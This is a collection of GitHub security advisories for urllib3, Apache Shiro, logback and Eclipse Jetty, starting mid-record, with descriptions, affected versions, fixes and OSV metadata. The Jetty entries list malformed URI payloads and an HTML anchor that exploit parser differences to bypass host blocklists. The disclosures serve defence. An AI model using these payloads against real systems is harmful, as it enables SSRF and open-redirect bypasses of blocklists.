"url": "http://www.openwall.com/lists/oss-security/2023/11/19/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "SnakeYaml Constructor Deserialization Remote Code Execution"
}
GHSA-MF9V-MFXR-J63J
Vulnerability from github – Published: 2026-05-11 14:51 – Updated: 2026-06-08 19:52Impact
urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.
urllib3 can perform decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). When using the streaming API since version 2.6.0, the library decompresses only the necessary bytes, enabling partial content consumption.
However, urllib3 before version 2.7.0 could still decompress the whole response instead of the requested portion in two cases:
1. During the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library.
2. When HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here).
These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side.
Affected usages
Applications and libraries using urllib3 versions earlier than 2.7.0 may be affected when streaming compressed responses from untrusted sources in either of these cases, unless decompression is explicitly disabled:
- A response encoded with
bris read incrementally with at least twoHTTPResponse.read(amt=N)orHTTPResponse.stream(amt=N)calls while using the official Brotli library. HTTPResponse.drain_conn()is called after response decompression has already started.
Remediation
Upgrade to at least urllib3 version 2.7.0 in which the library:
1. Is more efficient for reads with Brotli.
2. Always skips decompression for HTTPResponse.drain_conn().
If upgrading is not immediately possible, the following workarounds may reduce exposure in specific cases:
1. For the Brotli-specific issue only, switch from brotli to brotlicffi until you can upgrade urllib3; the official Brotli package is affected because of https://github.com/google/brotli/issues/1396.
2. If your code explicitly calls HTTPResponse.drain_conn(), call HTTPResponse.close() instead when connection reuse is not important.
Credits
The Brotli-specific issue was reported by @kimkou2024.
HTTPResponse.drain_conn() inefficiency was reported by @Cycloctane.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44432"
],
"database_specific": {
"cwe_ids": [
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T14:51:45Z",
"nvd_published_at": "2026-05-13T16:16:57Z",
"severity": "HIGH"
},
"details": "### Impact\n\nurllib3\u0027s [streaming API](https://urllib3.readthedocs.io/en/2.7.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API since version 2.6.0, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, urllib3 before version 2.7.0 could still decompress the whole response instead of the requested portion in two cases:\n1. During the second `HTTPResponse.read(amt=N)` call when the response was decompressed using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. When `HTTPResponse.drain_conn()` was called after the response had been read and decompressed partially (compression algorithm did not matter here).\n\nThese issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected when streaming compressed responses from untrusted sources in either of these cases, unless decompression is explicitly disabled:\n\n1. A response encoded with `br` is read incrementally with at least two `HTTPResponse.read(amt=N)` or `HTTPResponse.stream(amt=N)` calls while using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. `HTTPResponse.drain_conn()` is called after response decompression has already started.\n\n\n### Remediation\n\nUpgrade to at least urllib3 version 2.7.0 in which the library:\n1. Is more efficient for reads with Brotli.\n2. Always skips decompression for `HTTPResponse.drain_conn()`.\n\nIf upgrading is not immediately possible, the following workarounds may reduce exposure in specific cases:\n1. For the Brotli-specific issue only, switch from [brotli](https://pypi.org/project/brotli/) to [brotlicffi](https://pypi.org/project/brotlicffi/) until you can upgrade urllib3; the official Brotli package is affected because of https://github.com/google/brotli/issues/1396.\n2. If your code explicitly calls `HTTPResponse.drain_conn()`, call `HTTPResponse.close()` instead when connection reuse is not important.\n\n\n### Credits\n\nThe Brotli-specific issue was reported by @kimkou2024.\n`HTTPResponse.drain_conn()` inefficiency was reported by @Cycloctane.",
"id": "GHSA-mf9v-mfxr-j63j",
"modified": "2026-06-08T19:52:23Z",
"published": "2026-05-11T14:51:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
"type": "CVSS_V4"
}
],
"summary": "urllib3: Decompression-bomb safeguards bypassed in parts of the streaming API"
}
GHSA-C4QC-4Q9P-M9Q9
Vulnerability from github – Published: 2026-02-10 12:30 – Updated: 2026-02-10 14:33Observable Timing Discrepancy vulnerability in Apache Shiro.
This issue affects Apache Shiro: from 1., 2. before 2.0.7.
Users are recommended to upgrade to version 2.0.7 or later, which fixes the issue.
Prior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough, that a brute-force attack may be able to tell, by timing the requests only, determine if the request failed because of a non-existent user vs. wrong password.
The most likely attack vector is a local attack only. Shiro security model https://shiro.apache.org/security-model.html#username_enumeration discusses this as well.
Typically, brute force attack can be mitigated at the infrastructure level.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.shiro:shiro-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23901"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-10T14:33:33Z",
"nvd_published_at": "2026-02-10T10:15:59Z",
"severity": "LOW"
},
"details": "Observable Timing Discrepancy vulnerability in Apache Shiro.\n\nThis issue affects Apache Shiro: from 1.*, 2.* before 2.0.7.\n\nUsers are recommended to upgrade to version 2.0.7 or later, which fixes the issue.\n\nPrior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough,\nthat a brute-force attack may be able to tell, by timing the requests only, determine if\nthe request failed because of a non-existent user vs. wrong password.\n\nThe most likely attack vector is a local attack only.\nShiro security model\u00a0 https://shiro.apache.org/security-model.html#username_enumeration \u00a0discusses this as well.\n\nTypically, brute force attack can be mitigated at the infrastructure level.",
"id": "GHSA-c4qc-4q9p-m9q9",
"modified": "2026-02-10T14:33:33Z",
"published": "2026-02-10T12:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23901"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/shiro"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/mm1jct9b86jvnh3y44tj22xvjtx3xhhh"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/02/08/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Apache Shiro Affected by an Observable Timing Discrepancy Vulnerability"
}
GHSA-QCCP-GFCP-XXVC
Vulnerability from github – Published: 2026-05-11 14:51 – Updated: 2026-05-14 20:35Impact
When following cross-origin redirects for requests made using urllib3’s high-level APIs, such as urllib3.request(), PoolManager.request(), and ProxyManager.request(), sensitive headers — Authorization, Cookie, and Proxy-Authorization (defined in Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT) — are stripped by default, as expected.
However, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers.
Affected usage
Applications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through HTTPConnection.urlopen() instances created via ProxyManager.connection_from_url().
Remediation
Upgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by HTTPConnection.
If upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to ProxyManager.request().
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "1.23"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44431"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T14:51:20Z",
"nvd_published_at": "2026-05-13T16:16:57Z",
"severity": "HIGH"
},
"details": "### Impact\n\nWhen following cross-origin redirects for requests made using urllib3\u2019s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers \u2014 `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) \u2014 are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.",
"id": "GHSA-qccp-gfcp-xxvc",
"modified": "2026-05-14T20:35:49Z",
"published": "2026-05-11T14:51:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "urllib3: Sensitive headers forwarded across origins in proxied low-level redirects"
}
GHSA-QH8G-58PP-2WXH
Vulnerability from github – Published: 2024-10-14 21:11 – Updated: 2025-03-07 13:49Summary
Eclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine . It includes a utility class, HttpURI, for URI/URL parsing.
The HttpURI class does insufficient validation on the authority segment of a URI. However the behaviour of HttpURI differs from the common browsers in how it handles a URI that would be considered invalid if fully validated against the RRC. Specifically HttpURI and the browser may differ on the value of the host extracted from an invalid URI and thus a combination of Jetty and a vulnerable browser may be vulnerable to a open redirect attack or to a SSRF attack if the URI is used after passing validation checks.
Details
Affected components
The vulnerable component is the HttpURI class when used as a utility class in an application. The Jetty usage of the class is not vulnerable.
Attack overview
The HttpURI class does not well validate the authority section of a URI. When presented with an illegal authority that may contain user info (eg username:password#@hostname:port), then the parsing of the URI is not failed. Moreover, the interpretation of what part of the authority is the host name differs from a common browser in that they also do not fail, but they select a different host name from the illegal URI.
Attack scenario
A typical attack scenario is illustrated in the diagram below. The Validator checks whether the attacker-supplied URL is on the blocklist. If not, the URI is passed to the Requester for redirection. The Requester is responsible for sending requests to the hostname specified by the URI.
This attack occurs when the Validator is the org.eclipse.jetty.http.HttpURI class and the Requester is the Browser (include chrome, firefox and Safari). An attacker can send a malformed URI to the Validator (e.g., http://browser.check%23%40vulndetector.com/ ). After validation, the Validator finds that the hostname is not on the blocklist. However, the Requester can still send requests to the domain with the hostname vulndetector.com.
PoC
payloads:
http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/
The problem of 302 redirect parsing in HTML tag scenarios. Below is a poc example. After clicking the button, the browser will open "browser.check", and jetty will parse this URL as "vulndetector.com".
<a href="http://browser.check#@vulndetector.com/"></a>
A comparison of the parsing differences between Jetty and chrome is shown in the table below (note that neither should accept the URI as valid).
| Invalid URI | Jetty | Chrome |
|---|---|---|
| http://browser.check &@vulndetector.com/ | vulndetector.com | browser.check |
| http://browser.check #@vulndetector.com/ | vulndetector.com | browser.check |
| http://browser.check?@vulndetector.com/ | vulndetector.com | browser.check |
| http://browser.check#@vulndetector.com/ | vulndetector.com | browser.check |
The problem of 302 redirect parsing in HTTP 302 Location
| Input | Jetty | Chrome |
|---|---|---|
| http://browser.check%5c/ | browser.check\ | browser.check |
It is noteworthy that Spring Web also faced similar security vulnerabilities, being affected by the aforementioned four types of payloads. These issues have since been resolved and have been assigned three CVE numbers [3-5].
Impact
The impact of this vulnerability is limited to developers that use the Jetty HttpURI directly. Example: your project implemented a blocklist to block on some hosts based on HttpURI's handling of authority section. The vulnerability will help attackers bypass the protections that developers have set up for hosts. The vulnerability will lead to SSRF[1] and URL Redirection[2] vulnerabilities in several cases.
Mitigation
The attacks outlined above rely on decoded user data being passed to the HttpURI class. Application should not pass decoded user data as an encoded URI to any URI class/method, including HttpURI. Such applications are likely to be vulnerable in other ways.
The immediate solution is to upgrade to a version of the class that will fully validate the characters of the URI authority. Ultimately, Jetty will deprecate and remove support for user info in the authority per RFC9110 Section 4.2.4.
Note that the Chrome (and other browsers) parse the invalid user info section improperly as well (due to flawed WhatWG URL parsing rules that do not apply outside of a Web Browser).
Reference
[1] https://cwe.mitre.org/data/definitions/918.html [2] https://cwe.mitre.org/data/definitions/601.html
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.0.11"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "12.0.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-6763"
],
"database_specific": {
"cwe_ids": [
"CWE-1286"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-14T21:11:43Z",
"nvd_published_at": "2024-10-14T16:15:04Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nEclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine . It includes a utility class, `HttpURI`, for URI/URL parsing.\n\nThe `HttpURI` class does insufficient validation on the authority segment of a URI. However the behaviour of `HttpURI` differs from the common browsers in how it handles a URI that would be considered invalid if fully validated against the RRC. Specifically `HttpURI` and the browser may differ on the value of the host extracted from an invalid URI and thus a combination of Jetty and a vulnerable browser may be vulnerable to a open redirect attack or to a SSRF attack if the URI is used after passing validation checks.\n\n## Details\n\n### Affected components\n\nThe vulnerable component is the `HttpURI` class when used as a utility class in an application. The Jetty usage of the class is not vulnerable.\n\n### Attack overview\n\nThe `HttpURI` class does not well validate the authority section of a URI. When presented with an illegal authority that may contain user info (eg username:password#@hostname:port), then the parsing of the URI is not failed. Moreover, the interpretation of what part of the authority is the host name differs from a common browser in that they also do not fail, but they select a different host name from the illegal URI.\n\n### Attack scenario\n\nA typical attack scenario is illustrated in the diagram below. The Validator checks whether the attacker-supplied URL is on the blocklist. If not, the URI is passed to the Requester for redirection. The Requester is responsible for sending requests to the hostname specified by the URI.\n\nThis attack occurs when the Validator is the `org.eclipse.jetty.http.HttpURI` class and the Requester is the `Browser` (include chrome, firefox and Safari). An attacker can send a malformed URI to the Validator (e.g., `http://browser.check%23%40vulndetector.com/` ). After validation, the Validator finds that the hostname is not on the blocklist. However, the Requester can still send requests to the domain with the hostname `vulndetector.com`.\n\n## PoC\n\npayloads:\n\n```\nhttp://browser.check \u0026@vulndetector.com/\nhttp://browser.check #@vulndetector.com/\nhttp://browser.check?@vulndetector.com/\nhttp://browser.check#@vulndetector.com/\nhttp://vulndetector.com\\\\/\n```\n\nThe problem of 302 redirect parsing in HTML tag scenarios. Below is a poc example. After clicking the button, the browser will open \"browser.check\", and jetty will parse this URL as \"vulndetector.com\".\n\n```\n\u003ca href=\"http://browser.check#@vulndetector.com/\"\u003e\u003c/a\u003e\n```\nA comparison of the parsing differences between Jetty and chrome is shown in the table below (note that neither should accept the URI as valid).\n\n| Invalid URI | Jetty | Chrome |\n| ---------------------------------------------- | ---------------- | ------------- |\n| http://browser.check \u0026@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check #@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check?@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check#@vulndetector.com/ | vulndetector.com | browser.check |\n\nThe problem of 302 redirect parsing in HTTP 302 Location\n\n| Input | Jetty | Chrome |\n| ------------------------ | -------------- | ------------- |\n| http://browser.check%5c/ | browser.check\\ | browser.check |\n\nIt is noteworthy that Spring Web also faced similar security vulnerabilities, being affected by the aforementioned four types of payloads. These issues have since been resolved and have been assigned three CVE numbers [3-5].\n\n## Impact\n\nThe impact of this vulnerability is limited to developers that use the Jetty HttpURI directly. Example: your project implemented a blocklist to block on some hosts based on HttpURI\u0027s handling of authority section. The vulnerability will help attackers bypass the protections that developers have set up for hosts. The vulnerability will lead to **SSRF**[1] and **URL Redirection**[2] vulnerabilities in several cases. \n\n## Mitigation\n\nThe attacks outlined above rely on decoded user data being passed to the `HttpURI` class. Application should not pass decoded user data as an encoded URI to any URI class/method, including `HttpURI`. Such applications are likely to be vulnerable in other ways. \nThe immediate solution is to upgrade to a version of the class that will fully validate the characters of the URI authority. Ultimately, Jetty will deprecate and remove support for user info in the authority per [RFC9110 Section 4.2.4](https://datatracker.ietf.org/doc/html/rfc9110#section-4.2.4). \n\nNote that the Chrome (and other browsers) parse the invalid user info section improperly as well (due to flawed WhatWG URL parsing rules that do not apply outside of a Web Browser).\n\n## Reference\n\n[1] https://cwe.mitre.org/data/definitions/918.html\n[2] https://cwe.mitre.org/data/definitions/601.html",
"id": "GHSA-qh8g-58pp-2wxh",
"modified": "2025-03-07T13:49:23Z",
"published": "2024-10-14T21:11:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-qh8g-58pp-2wxh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6763"
},
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/pull/12012"
},
{
"type": "PACKAGE",
"url": "https://github.com/jetty/jetty.project"
},
{
"type": "WEB",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/25"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250306-0005"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Eclipse Jetty URI parsing of invalid authority"
}
GHSA-QQPG-MVQG-649V
Vulnerability from github – Published: 2026-01-22 12:31 – Updated: 2026-01-22 18:06ACE vulnerability in configuration file processing by QOS.CH logback-core up to and including version 1.5.24 in Java applications, allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file.
The instantiation of a potentially malicious Java class requires that said class is present on the user's class-path. In addition, the attacker must have write access to a configuration file. However, after successful instantiation, the instance is very likely to be discarded with no further ado.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.25"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-1225"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-22T18:06:44Z",
"nvd_published_at": "2026-01-22T10:16:07Z",
"severity": "LOW"
},
"details": "ACE vulnerability in configuration file processing by QOS.CH logback-core up to and including version 1.5.24 in Java applications, allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file.\n\nThe instantiation of a potentially malicious Java class requires that said class is present on the user\u0027s class-path. In addition, the attacker must have write access to a configuration file. However, after successful instantiation, the instance is very likely to be discarded with no further ado.",
"id": "GHSA-qqpg-mvqg-649v",
"modified": "2026-01-22T18:06:44Z",
"published": "2026-01-22T12:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1225"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/issues/997"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/commit/1f97ae1844b1be8486e4e9cade98d7123d3eded5"
},
{
"type": "PACKAGE",
"url": "https://github.com/qos-ch/logback"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.5.25"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "Logback allows an attacker to instantiate classes already present on the class path"
}
GHSA-WJPW-4J6X-6RWH
Vulnerability from github – Published: 2026-03-05 21:41 – Updated: 2026-03-05 21:41The Jetty URI parser has some key differences compared to other common parsers when evaluating invalid or unusual URIs. Specifically:
Invalid Scheme
| URI | Jetty | uri-js (nodejs) | node-url(nodejs) |
|---|---|---|---|
https>://vulndetector.com/path |
scheme=http> |
scheme=https |
invalid URI |
Improper IPv4 mapped IPv6
| URI | Jetty | System.Uri(CSharp) | curl(C) |
|---|---|---|---|
http://[0:0:0:0:0:ffff:127.0.0.1] |
invalid | host=[::ffff:127.0.0.1] |
host=[::ffff:127.0.0.1] |
http://[::ffff:255.255.0.0] |
invalid | host=[::ffff:255.255.0.0] |
host=[::ffff:255.255.0.0] |
Incorrect IPv6 delimeter priority
| URI | Jetty | urllib3(python) | furl(python) | Spring | chromium |
|---|---|---|---|---|---|
http://[normal.com@]vulndetector.com/ |
host=[normal.com@] |
invalid | invalid | ||
http://normal.com[user@vulndetector].com/ |
host=[noirmal.com@vulndetector | | | host=normal.com` |
invalid | |||
http://normal.com[@]vulndetector.com/ |
host=normal.com[@] | | | host=normal.com` |
invalid |
Incorrect delimeter priority
| URI | Jetty | urllib3(python) | jersey |
|---|---|---|---|
http://normal.com/#@vulndetector.com |
host=vulndetector.com |
host=normal.com |
host=normal.com |
http://normal.com/?@vulndetector.com |
host=vulndetector.com |
host=normal.com |
host=normal.com |
Impact
Differential parsing of URIs in systems using multiple components may result in security by-pass. For example a component that enforces a black list may interpret the URIs differently from one that generates a response. At the very least, differential parsing may divulge implementation details.
Patches
Patched in Supported Open Source versions. * 12.1.5 - Supported and available on Maven Central * 12.0.31 - Supported and available on Maven Central * 11.0.x - EOL Release, patches available on tuxcare and herodevs * 10.0.x - EOL Release, patches available on tuxcare and herodevs * 9.4.x - EOL Release, patches available on tuxcare and herodevs
Workarounds
None
Resources
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "9.4.0"
},
{
"last_affected": "9.4.58"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"last_affected": "10.0.26"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"last_affected": "11.0.26"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.0.30"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.31"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.1.4"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "12.1.0"
},
{
"fixed": "12.1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-11143"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T21:41:25Z",
"nvd_published_at": "2026-03-05T10:15:54Z",
"severity": "LOW"
},
"details": "The Jetty URI parser has some key differences compared to other common parsers when evaluating invalid or unusual URIs. Specifically:\n\n#### Invalid Scheme\n| URI | Jetty | uri-js (nodejs) | node-url(nodejs) |\n|---|---|---| --- |\n| `https\u003e://vulndetector.com/path` | scheme=`http\u003e`| scheme=`https` | invalid URI |\n\n#### Improper IPv4 mapped IPv6\n\n| URI | Jetty | System.Uri(CSharp) | curl(C) |\n|---|---|---| --- |\n| `http://[0:0:0:0:0:ffff:127.0.0.1]` | invalid | host=`[::ffff:127.0.0.1]` | host=`[::ffff:127.0.0.1]` | \n| `http://[::ffff:255.255.0.0]` | invalid | host=`[::ffff:255.255.0.0]` | host=`[::ffff:255.255.0.0]` | \n\n#### Incorrect IPv6 delimeter priority\n\n| URI | Jetty | urllib3(python) | furl(python) | Spring | chromium |\n|---|---|---| --- |---|---|\n| `http://[normal.com@]vulndetector.com/` | host=`[normal.com@]` | invalid | invalid | | |\n| `http://normal.com[user@vulndetector].com/` | host=`[noirmal.com@vulndetector | | | host=`normal.com` | invalid |\n| `http://normal.com[@]vulndetector.com/` | host=`normal.com[@] | | | host=`normal.com` | invalid |\n\n#### Incorrect delimeter priority\n\n| URI | Jetty | urllib3(python) | jersey |\n|---|---|---| --- |\n| `http://normal.com/#@vulndetector.com` | host=`vulndetector.com` | host=`normal.com` | host=`normal.com` |\n| `http://normal.com/?@vulndetector.com` | host=`vulndetector.com` | host=`normal.com` | host=`normal.com` |\n\n\n### Impact\nDifferential parsing of URIs in systems using multiple components may result in security by-pass. For example a component that enforces a black list may interpret the URIs differently from one that generates a response.\nAt the very least, differential parsing may divulge implementation details. \n\n### Patches\nPatched in Supported Open Source versions.\n* 12.1.5 - Supported and available on Maven Central\n* 12.0.31 - Supported and available on Maven Central\n* 11.0.x - EOL Release, patches available on [tuxcare](https://tuxcare.com/) and [herodevs](https://www.herodevs.com/)\n* 10.0.x - EOL Release, patches available on [tuxcare](https://tuxcare.com/) and [herodevs](https://www.herodevs.com/)\n* 9.4.x - EOL Release, patches available on [tuxcare](https://tuxcare.com/) and [herodevs](https://www.herodevs.com/)\n\n### Workarounds\nNone\n\n### Resources\n\n + [Java Eclipse Jetty Report_ Incorrect Parsing Priority of the IPv6 Hostname Delimeter.pdf](https://github.com/user-attachments/files/22222625/Java.Eclipse.Jetty.Report_.Incorrect.Parsing.Priority.of.the.IPv6.Hostname.Delimeter.pdf)\n + [Java Eclipse Jetty Report_ The Parsing Priority of the Delimiter.pdf](https://github.com/user-attachments/files/22222626/Java.Eclipse.Jetty.Report_.The.Parsing.Priority.of.the.Delimiter.pdf)\n + [Java Eclipse Jetty Report_ Parsing Difference Due to Deformed Scheme.pdf](https://github.com/user-attachments/files/22222627/Java.Eclipse.Jetty.Report_.Parsing.Difference.Due.to.Deformed.Scheme.pdf)\n + [Java Eclipse Jetty Report_ Improper IPv4-mapped IPv6 Parsing.pdf](https://github.com/user-attachments/files/22222630/Java.Eclipse.Jetty.Report_.Improper.IPv4-mapped.IPv6.Parsing.pdf)",
"id": "GHSA-wjpw-4j6x-6rwh",
"modified": "2026-03-05T21:41:25Z",
"published": "2026-03-05T21:41:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-wjpw-4j6x-6rwh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11143"
},
{
"type": "PACKAGE",
"url": "https://github.com/jetty/jetty.project"
},
{
"type": "WEB",
"url": "https://github.com/user-attachments/files/22222625/Java.Eclipse.Jetty.Report_.Incorrect.Parsing.Priority.of.the.IPv6.Hostname.Delimeter.pdf"
},
{
"type": "WEB",
"url": "https://github.com/user-attachments/files/22222626/Java.Eclipse.Jetty.Report_.The.Parsing.Priority.of.the.Delimiter.pdf"
},
{
"type": "WEB",
"url": "https://github.com/user-attachments/files/22222627/Java.Eclipse.Jetty.Report_.Parsing.Difference.Due.to.Deformed.Scheme.pdf"
},
{
"type": "WEB",
"url": "https://github.com/user-attachments/files/22222630/Java.Eclipse.Jetty.Report_.Improper.IPv4-mapped.IPv6.Parsing.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "org.eclipse.jetty:jetty-http has different parsing of invalid URIs"
}
